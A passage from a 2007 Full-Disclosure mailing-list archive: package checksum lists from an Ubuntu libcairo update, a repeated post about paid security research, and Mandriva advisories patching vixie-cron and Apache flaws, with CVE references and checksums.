      Size/MD5:    28909 dc5d96d605e11690a89a0cc59e042e65
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.2-0ubuntu1.1.dsc
      Size/MD5:      980 09a868118408cab715afdba4a64544bf
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.2.orig.tar.gz
      Size/MD5:  3081092 b254633046eafe603776d0bee791b751

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-doc_1.4.2-0ubuntu1.1_all.deb
      Size/MD5:   328950 d240767edabea69fab2d1340061a8415

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.2-0ubuntu1.1_amd64.deb
      Size/MD5:   514708 b394fa71b94e568a71e4ace24a2a1977
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.2-0ubuntu1.1_amd64.deb
      Size/MD5:   429892 845d889c83417a8574f378694f81bbd1
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.2-0ubuntu1.1_amd64.deb
      Size/MD5:   536802 7ed3be4626a9244c0fafb45fc010a280
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.2-0ubuntu1.1_amd64.deb
      Size/MD5:   445778 6afcb89b07478475ac4a8979f1c1c308
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.2-0ubuntu1.1_amd64.udeb
      Size/MD5:   213856 51637a90f27e73133b71a28ec312b76d

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.2-0ubuntu1.1_i386.deb
      Size/MD5:   488474 321045d3cc696388a577d91cb1b2247c
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.2-0ubuntu1.1_i386.deb
      Size/MD5:   419802 89c9b3258a0f360ada145028902d09a2
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.2-0ubuntu1.1_i386.deb
      Size/MD5:   508426 5b857c0d96578e0be3a94dc946e2b517
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.2-0ubuntu1.1_i386.deb
      Size/MD5:   435198 ccc97bd5ac8e03b2c19cc3b3d4fc1781
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.2-0ubuntu1.1_i386.udeb
      Size/MD5:   203914 04537f47590bc36266085f342c401d58

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.2-0ubuntu1.1_powerpc.deb
      Size/MD5:   498194 474be7633bf6807c5feed136a9e7a675
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.2-0ubuntu1.1_powerpc.deb
      Size/MD5:   422678 13195737993d842cff7f86fe253c74bd
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.2-0ubuntu1.1_powerpc.deb
      Size/MD5:   520250 36577274181793f8c962581e89621281
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.2-0ubuntu1.1_powerpc.deb
      Size/MD5:   438486 e63d2bacd6728ff18133c4cfa821863e
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.2-0ubuntu1.1_powerpc.udeb
      Size/MD5:   206840 84b1ad8e538fd2f7c2e7244acc145d89

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.2-0ubuntu1.1_sparc.deb
      Size/MD5:   471746 caefead3a3d701d2511f569bef6f7c5b
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.2-0ubuntu1.1_sparc.deb
      Size/MD5:   402034 b67d2c0dc7b8463c5dc490f61a67b99d
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.2-0ubuntu1.1_sparc.deb
      Size/MD5:   491938 1d6e659088b0640d97e3706388f8395e
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.2-0ubuntu1.1_sparc.deb
      Size/MD5:   416758 4d7530c925a14f982b46c3d21e736540
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.2-0ubuntu1.1_sparc.udeb
      Size/MD5:   186118 7b18ab17c8e4362d52fd339ea1ecdf45

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.10-1ubuntu4.1.diff.gz
      Size/MD5:    35570 12f55e0fce101397b1030e3085e787e9
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.10-1ubuntu4.1.dsc
      Size/MD5:     1013 563489e7174346f4fbbd0503a3c0f9ed
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo_1.4.10.orig.tar.gz
      Size/MD5:  3216689 5598a5e500ad922e37b159dee72fc993

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-doc_1.4.10-1ubuntu4.1_all.deb
      Size/MD5:   407584 264885e31177e66f213e1105cf87b1f7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.10-1ubuntu4.1_amd64.deb
      Size/MD5:   571828 988ad2fddde5034618d78dce50b2ac34
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.10-1ubuntu4.1_amd64.deb
      Size/MD5:   488860 8702b2a50e6a7021c7ed56dcea3c7f10
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.10-1ubuntu4.1_amd64.deb
      Size/MD5:   632534 9ee7fd807a87bf3cbe6a582f7ceaee45
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.10-1ubuntu4.1_amd64.deb
      Size/MD5:   536752 b07df53c9796fa11031fa9cb1188285d
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.10-1ubuntu4.1_amd64.udeb
      Size/MD5:   195644 4db32d0439a5d30782c2862a6a238a13

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.10-1ubuntu4.1_i386.deb
      Size/MD5:   546244 dcdca233fd9dfe301bdc4eb003958e73
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.10-1ubuntu4.1_i386.deb
      Size/MD5:   479388 f72bfa5554759ab7121f86dff86e1b96
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.10-1ubuntu4.1_i386.deb
      Size/MD5:   601014 e6ad6e1a08cd5eb80b3004727a502b6e
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.10-1ubuntu4.1_i386.deb
      Size/MD5:   523870 7904ff1c74a8fb55504e02eb7ea83a05
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.10-1ubuntu4.1_i386.udeb
      Size/MD5:   186260 e23492f349678781988ab526a5f5b371

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.10-1ubuntu4.1_powerpc.deb
      Size/MD5:   554614 4aa9520c327bc96bf0f33e740584a4b8
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.10-1ubuntu4.1_powerpc.deb
      Size/MD5:   478798 c25f183b7bd4291d8de295b98dceecfa
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.10-1ubuntu4.1_powerpc.deb
      Size/MD5:   613700 13bf3f4c94d3cfb6141f20beccbaaa76
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.10-1ubuntu4.1_powerpc.deb
      Size/MD5:   528254 693491287b6695c4487604199f285dd6
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.10-1ubuntu4.1_powerpc.udeb
      Size/MD5:   186174 39dd373e44b1e0e3138c78e313ba332a

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2-dev_1.4.10-1ubuntu4.1_sparc.deb
      Size/MD5:   543434 f26a9fd33bba743ce57168a92e6fab15
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo-directfb2_1.4.10-1ubuntu4.1_sparc.deb
      Size/MD5:   470870 44c50c6a3b2a3b6b22e7c9df743f1ede
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2-dev_1.4.10-1ubuntu4.1_sparc.deb
      Size/MD5:   584514 3cb9245c5f4acd9b78177dadd3a43279
    http://security.ubuntu.com/ubuntu/pool/main/libc/libcairo/libcairo2_1.4.10-1ubuntu4.1_sparc.deb
      Size/MD5:   505054 2272a6ba6f78bf385f9cc1d21cfd078c
    http://security.ubuntu.com/ubuntu/pool/universe/libc/libcairo/libcairo-directfb2-udeb_1.4.10-1ubuntu4.1_sparc.udeb
      Size/MD5:   177480 4d618844733ed433ca2afc74a52e47a6

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071203/b72e95d2/attachment.bin 

From unknown.pentester at gmail.com  Mon Dec  3 23:16:54 2007
From: unknown.pentester at gmail.com (Adrian P)
Date: Mon, 3 Dec 2007 23:16:54 +0000
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <8a6b8e350712021135o7e96e8d9l54403728051796b7@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
	<4ef5fec60712021129k6426162do9561a44ff445fa2@mail.gmail.com>
	<8a6b8e350712021135o7e96e8d9l54403728051796b7@mail.gmail.com>
Message-ID: <b7a807650712031516s15e6f6fah243205c0b7b0304b@mail.gmail.com>

Hi folks!

Just wanted to say that it IS possible to make good money and have fun
breaking security. Lots of security researchers out there are offered
very generous positions which sometimes allows them to work from home.

In many of these positions the researcher chooses what to break, and
the employer is OK with that since they also get good publicity for
publishing the findings anyways.

In short, it IS possible to have fun while working and make very good
money. Does that mean you're not a hacker anymore? I don't think so!
What it means is that you're clever since you managed to do what you
like, legally, and get paid very good money for breaking toys just
like you used to do when you were a child.

Regards,
AP.

On Dec 2, 2007 7:35 PM, James Matthews <nytrokiss at gmail.com> wrote:
> Correct there must be a separation between work and play! But playing will
> always be fun!
>
>
>
> On Dec 2, 2007 8:29 PM, coderman <coderman at gmail.com> wrote:
> > On Dec 2, 2007 5:47 PM, jf <jf at danglingpointers.net > wrote:
> > > ... something southern baptists ...
> >
> > > You're doing it wrong.
> >
> > oh well, i checked monster.com and my ruse didn't work.
> > no employeee exodus, no new signing bonus, and here i thought you'd all
> > send email notice on a pleasant saturday afternoon.
> >
> > guess i'll have to pay for that CISSP after all...
> >
> > [tell you what jf and pdp, i'd be more curious to know how you
> >  cultivated that "job" that isn't yet pays well than continuing this
> >  thread before it spirals further into inanity...]
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> http://search.goldwatches.com/?Search=Movado+Watches
> http://www.jewelerslounge.com
> http://www.goldwatches.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
pagvac
gnucitizen.org, ikwt.com



From unknown.pentester at gmail.com  Mon Dec  3 23:16:54 2007
From: unknown.pentester at gmail.com (Adrian P)
Date: Mon, 3 Dec 2007 23:16:54 +0000
Subject: [Full-disclosure] authentic hackers still do it for the love
	... (was: Hell Camp: It never pays enough)
In-Reply-To: <8a6b8e350712021135o7e96e8d9l54403728051796b7@mail.gmail.com>
References: <4ef5fec60712012228oe7333a2t894b553628f1d8c@mail.gmail.com>
	<Pine.LNX.4.64.0712030125120.20541@localhost.localdomain>
	<4ef5fec60712021129k6426162do9561a44ff445fa2@mail.gmail.com>
	<8a6b8e350712021135o7e96e8d9l54403728051796b7@mail.gmail.com>
Message-ID: <b7a807650712031516s15e6f6fah243205c0b7b0304b@mail.gmail.com>

Hi folks!

Just wanted to say that it IS possible to make good money and have fun
breaking security. Lots of security researchers out there are offered
very generous positions which sometimes allows them to work from home.

In many of these positions the researcher chooses what to break, and
the employer is OK with that since they also get good publicity for
publishing the findings anyways.

In short, it IS possible to have fun while working and make very good
money. Does that mean you're not a hacker anymore? I don't think so!
What it means is that you're clever since you managed to do what you
like, legally, and get paid very good money for breaking toys just
like you used to do when you were a child.

Regards,
AP.

On Dec 2, 2007 7:35 PM, James Matthews <nytrokiss at gmail.com> wrote:
> Correct there must be a separation between work and play! But playing will
> always be fun!
>
>
>
> On Dec 2, 2007 8:29 PM, coderman <coderman at gmail.com> wrote:
> > On Dec 2, 2007 5:47 PM, jf <jf at danglingpointers.net > wrote:
> > > ... something southern baptists ...
> >
> > > You're doing it wrong.
> >
> > oh well, i checked monster.com and my ruse didn't work.
> > no employeee exodus, no new signing bonus, and here i thought you'd all
> > send email notice on a pleasant saturday afternoon.
> >
> > guess i'll have to pay for that CISSP after all...
> >
> > [tell you what jf and pdp, i'd be more curious to know how you
> >  cultivated that "job" that isn't yet pays well than continuing this
> >  thread before it spirals further into inanity...]
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> http://search.goldwatches.com/?Search=Movado+Watches
> http://www.jewelerslounge.com
> http://www.goldwatches.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
pagvac
gnucitizen.org, ikwt.com



From security at mandriva.com  Mon Dec  3 23:33:15 2007
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 03 Dec 2007 16:33:15 -0700
Subject: [Full-disclosure] [ MDKSA-2007:234 ] - Updated vixie-cron packages
	fix DoS vulnerability
Message-ID: <E1IzKmp-0002qo-Gp@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2007:234
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : vixie-cron
 Date    : December 3, 2007
 Affected: 2007.0, 2007.1, 2008.0
 _______________________________________________________________________
 
 Problem Description:
 
 Raphael Marichez discovered a denial of service bug in how vixie-cron
 verifies crontab file integrity.  A local user with the ability
 to create a hardlink to /etc/crontab could prevent vixie-cron from
 executing certain system cron jobs.
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1856
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 123b5f8f021f12d910a4348e9a557ec7  2007.0/i586/vixie-cron-4.1-9.1mdv2007.0.i586.rpm 
 682d18fa3ebec317be382fb40c140745  2007.0/SRPMS/vixie-cron-4.1-9.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 e797aa1deb1aa45a3ac31967341d4271  2007.0/x86_64/vixie-cron-4.1-9.1mdv2007.0.x86_64.rpm 
 682d18fa3ebec317be382fb40c140745  2007.0/SRPMS/vixie-cron-4.1-9.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 901d627bc295b396d1b9d331a7b538cd  2007.1/i586/vixie-cron-4.1-9.1mdv2007.1.i586.rpm 
 e08498cdcb6f66fd167e6cd22d6c7c6b  2007.1/SRPMS/vixie-cron-4.1-9.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 dba8945a07a6c835bc58d33884b1f50b  2007.1/x86_64/vixie-cron-4.1-9.1mdv2007.1.x86_64.rpm 
 e08498cdcb6f66fd167e6cd22d6c7c6b  2007.1/SRPMS/vixie-cron-4.1-9.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 1b273c4f69665e22bf56f3da76c52556  2008.0/i586/vixie-cron-4.1-9.1mdv2008.0.i586.rpm 
 148738b227103c0b1ee25e5f6ca747eb  2008.0/SRPMS/vixie-cron-4.1-9.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 ebcf2fcf7c88dd88688eb4aa9f8a6bb2  2008.0/x86_64/vixie-cron-4.1-9.1mdv2008.0.x86_64.rpm 
 148738b227103c0b1ee25e5f6ca747eb  2008.0/SRPMS/vixie-cron-4.1-9.1mdv2008.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHVGdymqjQ0CJFipgRAvULAJ4n+2Dlm4NEn+MwIifN7JseggseXgCfVifu
84n3Yi80xysJJBKRbwH0KRc=
=bPBV
-----END PGP SIGNATURE-----



From security at mandriva.com  Mon Dec  3 23:45:14 2007
From: security at mandriva.com (security at mandriva.com)
Date: Mon, 03 Dec 2007 16:45:14 -0700
Subject: [Full-disclosure] [ MDKSA-2007:235 ] - Updated apache packages fix
	vulnerabilities
Message-ID: <E1IzKyQ-000341-4s@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2007:235
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : apache
 Date    : December 3, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A flaw in the Apache mod_proxy module was found that could potentially
 lead to a denial of service is using a threaded Multi-Processing
 Module.  On sites where a reverse proxy is configured, a remote
 attacker could send a special reequest that would cause the Apache
 child process handling the request to crash.  Likewise, a similar crash
 could occur on sites with a forward proxy configured if a user could
 be persuaded to visit a malicious site using the proxy (CVE-2007-3847).
 
 A flaw in the Apache mod_autoindex module was found.  On sites where
 directory listings are used and the AddDefaultCharset directive was
 removed from the configuration, a cross-site-scripting attack could
 be possible against browsers that to not correctly derive the response
 character set according to the rules in RGC 2616 (CVE-2007-4465).
 
 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 9bb73822e8ae92ba87aa8baa21d467d1  2007.0/i586/apache-base-2.2.3-1.2mdv2007.0.i586.rpm
 1949631d7fc0f87c91ba5dd9e738e036  2007.0/i586/apache-devel-2.2.3-1.2mdv2007.0.i586.rpm
 3fed692d7b2eefe64bdd5f557fb0d838  2007.0/i586/apache-htcacheclean-2.2.3-1.2mdv2007.0.i586.rpm
 86b32442b40c9e8ee9ba4bc1def61157  2007.0/i586/apache-mod_authn_dbd-2.2.3-1.2mdv2007.0.i586.rpm
 a6ca98077bee65a270a7777f6a3f3b60  2007.0/i586/apache-mod_cache-2.2.3-1.2mdv2007.0.i586.rpm
 3bf50ab09740de6e718dc38e5320a3f7  2007.0/i586/apache-mod_dav-2.2.3-1.2mdv2007.0.i586.rpm
 11e3dde4beab554a1523261979852fee  2007.0/i586/apache-mod_dbd-2.2.3-1.2mdv2007.0.i586.rpm
 993926a12a2b5192059961a8bcbf4e2c  2007.0/i586/apache-mod_deflate-2.2.3-1.2mdv2007.0.i586.rpm
 8553d309d0b537732375fbf0ab6c3187  2007.0/i586/apache-mod_disk_cache-2.2.3-1.2mdv2007.0.i586.rpm
 83a1fce76091ea660989b5b310d545ab  2007.0/i586/apache-mod_file_cache-2.2.3-1.2mdv2007.0.i586.rpm
 c7799b98922ee0e2f5bd114a3b2f3816  2007.0/i586/apache-mod_ldap-2.2.3-1.2mdv2007.0.i586.rpm
 b3e79d78c26282b39322910be91cd410  2007.0/i586/apache-mod_mem_cache-2.2.3-1.2mdv2007.0.i586.rpm
 6c72e3c58cb10447304328c2f863651a  2007.0/i586/apache-mod_proxy-2.2.3-1.2mdv2007.0.i586.rpm
 a6d09de71a6b7bf7bb1cafc187777be7  2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.2mdv2007.0.i586.rpm
 05eee18af88226fb76766a9b88d843a8  2007.0/i586/apache-mod_ssl-2.2.3-1.2mdv2007.0.i586.rpm
 c499609426acef2255940cab04a28b5c  2007.0/i586/apache-mod_userdir-2.2.3-1.2mdv2007.0.i586.rpm
 bcd0563b948d8958de5a8da12e5ecd85  2007.0/i586/apache-modules-2.2.3-1.2mdv2007.0.i586.rpm
 5c4777a2db7fd28b233d1bcc1d570a70  2007.0/i586/apache-mpm-prefork-2.2.3-1.2mdv2007.0.i586.rpm
 fa38945281388cfd4d37d2f98187a0b0  2007.0/i586/apache-mpm-worker-2.2.3-1.2mdv2007.0.i586.rpm
 30e14fac38a58a8ab4bf59a6ecb59f9a  2007.0/i586/apache-source-2.2.3-1.2mdv2007.0.i586.rpm 
 9bf612bc66eff80fe93f34151959eede  2007.0/SRPMS/apache-2.2.3-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 3301ff7aa05c7cb14eecfc82d1d7fe33  2007.0/x86_64/apache-base-2.2.3-1.2mdv2007.0.x86_64.rpm
 f0f6cc2cc841959558ab0222d975a9cc  2007.0/x86_64/apache-devel-2.2.3-1.2mdv2007.0.x86_64.rpm
 7bf4dbf62cd08717fc3704798d0c839d  2007.0/x86_64/apache-htcacheclean-2.2.3-1.2mdv2007.0.x86_64.rpm
 ecb3772fac317f54303d1d67c2b1c7a2  2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.2mdv2007.0.x86_64.rpm
 c6cb91541e0f7a24b337da09ee7eb248  2007.0/x86_64/apache-mod_cache-2.2.3-1.2mdv2007.0.x86_64.rpm
 f39c5879ff62c5d8dcc41ae73d1ca0cd  2007.0/x86_64/apache-mod_dav-2.2.3-1.2mdv2007.0.x86_64.rpm
 562dc2a4e6246fa7dde9986af40ec847  2007.0/x86_64/apache-mod_dbd-2.2.3-1.2mdv2007.0.x86_64.rpm
 7be58654d28b2fc0207c3e44370cd118  2007.0/x86_64/apache-mod_deflate-2.2.3-1.2mdv2007.0.x86_64.rpm
 6e4314853613d0d9fdd048c8ee96a510  2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.2mdv2007.0.x86_64.rpm
 5fd5dc78b84bb5579291d27f626cb660  2007.0/x86_64/apache-mod_file_cache-2.2.3-1.2mdv2007.0.x86_64.rpm
 d5eecb080611220807820106c24b1e22  2007.0/x86_64/apache-mod_ldap-2.2.3-1.2mdv2007.0.x86_64.rpm
 bed61f6dcb6311d99fb97225a0b48849  2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.2mdv2007.0.x86_64.rpm
 f0d3bb15ba884824380ef1cf0bd129b8  2007.0/x86_64/apache-mod_proxy-2.2.3-1.2mdv2007.0.x86_64.rpm
 8f8969581110089a51cf506b8566315e  2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.2mdv2007.0.x86_64.rpm
 1a40d73c8fbbae8868f09ef947407dad  2007.0/x86_64/apache-mod_ssl-2.2.3-1.2mdv2007.0.x86_64.rpm
 0cd432c837a9ba4795bda96b1d3cc98c  2007.0/x86_64/apache-mod_userdir-2.2.3-1.2mdv2007.0.x86_64.rpm
 f05d88bc8f9c163ca787c30e7bd84e52  2007.0/x86_64/apache-modules-2.2.3-1.2mdv2007.0.x86_64.rpm
 f5431063918c470fa1ccd6e23db4c70d  2007.0/x86_64/apache-mpm-prefork-2.2.3-1.2mdv2007.0.x86_64.rpm
 0db10b3a236c2f59a93eb2bc6ee6c35d  2007.0/x86_64/apache-mpm-worker-2.2.3-1.2mdv2007.0.x86_64.rpm
 71f52e6e3afba9d1d923cc64291eb98f  2007.0/x86_64/apache-source-2.2.3-1.2mdv2007.0.x86_64.rpm 
 9bf612bc66eff80fe93f34151959eede  2007.0/SRPMS/apache-2.2.3-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 e443a21ce0b058aede2aaf82d12d22f7  2007.1/i586/apache-base-2.2.4-6.3mdv2007.1.i586.rpm
 6d17234fb69995d52c012bb22f52bab3  2007.1/i586/apache-devel-2.2.4-6.3mdv2007.1.i586.rpm
 6a44621592a2320b6d0e9549eceea6a9  2007.1/i586/apache-htcacheclean-2.2.4-6.3mdv2007.1.i586.rpm
 d0405211b42d562933cd2f802a4276bc  2007.1/i586/apache-mod_authn_dbd-2.2.4-6.3mdv2007.1.i586.rpm
 3fd09fafa06eb4e08ad975f9972f28f8  2007.1/i586/apache-mod_cache-2.2.4-6.3mdv2007.1.i586.rpm
 d61498465662a9c4a7f77f2dcc9438a7  2007.1/i586/apache-mod_dav-2.2.4-6.3mdv2007.1.i586.rpm
 fbb6c3ccfd793a8f2b9889ed399d5aad  2007.1/i586/apache-mod_dbd-2.2.4-6.3mdv2007.1.i586.rpm
 0e67be9eaacb5f8686acdd95d26b8b47  2007.1/i586/apache-mod_deflate-2.2.4-6.3mdv2007.1.i586.rpm
 f1a050f23e3bc518b8aecd3c6cd5fd91  2007.1/i586/apache-mod_disk_cache-2.2.4-6.3mdv2007.1.i586.rpm
 d95079c4a7627fe47d529dbe99549023  2007.1/i586/apache-mod_file_cache-2.2.4-6.3mdv2007.1.i586.rpm
 b24dcaec7dc26c107ff0962d46c7b3a1  2007.1/i586/apache-mod_ldap-2.2.4-6.3mdv2007.1.i586.rpm
 98e97b3bd11ca7939aef2bae47c2c497  2007.1/i586/apache-mod_mem_cache-2.2.4-6.3mdv2007.1.i586.rpm
 bffefef1346635e79f04d0ae56169ab1  2007.1/i586/apache-mod_proxy-2.2.4-6.3mdv2007.1.i586.rpm
 0c5881d9e76e9ae20470a954200465ae  2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.3mdv2007.1.i586.rpm
 21f665113f11b4b88330b887254023f8  2007.1/i586/apache-mod_ssl-2.2.4-6.3mdv2007.1.i586.rpm
 192801a60a254a58b57e2f1377ce42c4  2007.1/i586/apache-mod_userdir-2.2.4-6.3mdv2007.1.i586.rpm
 51fc25858a4ee79d2fd2cfe460c90708  2007.1/i586/apache-modules-2.2.4-6.3mdv2007.1.i586.rpm
 d6256083a3df248847340d3c14ecb9ff  2007.1/i586/apache-mpm-event-2.2.4-6.3mdv2007.1.i586.rpm
 1359ad128d2d7a24d9211cf7f0276e15  2007.1/i586/apache-mpm-itk-2.2.4-6.3mdv2007.1.i586.rpm
 d65ac7009e90022455c79debf48cdbdb  2007.1/i586/apache-mpm-prefork-2.2.4-6.3mdv2007.1.i586.rpm
 f1d8883b5e633cbb6e3832e7b3c4a4cb  2007.1/i586/apache-mpm-worker-2.2.4-6.3mdv2007.1.i586.rpm
 947251a0ac81cb912bc4c900bb80e6e7  2007.1/i586/apache-source-2.2.4-6.3mdv2007.1.i586.rpm 
 299d821f2388c0b4eb49992472225564  2007.1/SRPMS/apache-2.2.4-6.3mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 444c86d0a5711e30534400781c0cbcf1  2007.1/x86_64/apache-base-2.2.4-6.3mdv2007.1.x86_64.rpm
 02514acbf20766b1486389ce4d3e1ed0  2007.1/x86_64/apache-devel-2.2.4-6.3mdv2007.1.x86_64.rpm
 f6f4126d5a414d7ca686395173aaa3b4  2007.1/x86_64/apache-htcacheclean-2.2.4-6.3mdv2007.1.x86_64.rpm
 1a45be10e44347c913d6493a0d3ad25f  2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.3mdv2007.1.x86_64.rpm
 5e6df108e6fb0083ffe96810f41bc9ea  2007.1/x86_64/apache-mod_cache-2.2.4-6.3mdv2007.1.x86_64.rpm
 31877eb202cbc9cf0869a3d7bc51b47a  2007.1/x86_64/apache-mod_dav-2.2.4-6.3mdv2007.1.x86_64.rpm
 33a4ce4f105fbed60b2cdfc73fd524c6  2007.1/x86_64/apache-mod_dbd-2.2.4-6.3mdv2007.1.x86_64.rpm
 e093528141ed7cd178ae27743ed4ea69  2007.1/x86_64/apache-mod_deflate-2.2.4-6.3mdv2007.1.x86_64.rpm
